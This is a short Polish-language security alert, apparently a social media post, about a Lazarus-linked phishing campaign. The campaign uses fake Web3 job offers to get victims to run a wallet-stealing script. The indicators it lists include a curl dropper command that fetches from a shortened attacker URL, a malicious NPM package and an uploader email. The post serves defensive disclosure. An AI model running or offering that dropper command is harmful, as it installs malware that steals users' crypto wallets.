🚨 Alert bezpieczeństwa TI 🚨 Zgodnie z informacjami od par

🚨 Alert bezpieczeństwa TI 🚨
Zgodnie z informacjami od partnera społeczności @1nf0s3cpt, aktywna kampania phishingowa celuje w użytkowników Web3 z fałszywymi ofertami pracy (np. $120/godzinę), aby oszukać ich w wykonaniu złośliwego skryptu, który kradnie pliki portfeli.
🔍 Kluczowe IOCs:
🔸Repozytorium GitLab: https://t.co/ivGN93PS4b
🔸Dropper: curl https://t.co/fwRuktoVd9 -H "x-secret-key: _"
🧪 Metoda ataku jest bardzo podobna do wcześniejszego wykorzystania NPM przez Lazarusa do rozprzestrzeniania złośliwego kodu:
https://t.co/bBC4i2vYpA
🚨 Odkryliśmy, że nowy złośliwy pakiet NPM został właśnie opublikowany:
https://t.co/SjgmO1FOIL
🔸Prawdopodobnie powiązany z GitHub: apollo-hero
🔸Email przesyłającego: skelstar125@gmail.com
⚠️ Nie instaluj ani nie uruchamiaj nieznanych pakietów ani skryptów. Zawsze weryfikuj źródła.
#LAZARUS #Phishing

.css-1iqe90x{box-sizing:border-box;margin:0;min-width:0;color:#EAECEF;}🚨 Alert bezpieczeństwa TI 🚨

🚨 Alert bezpieczeństwa TI 🚨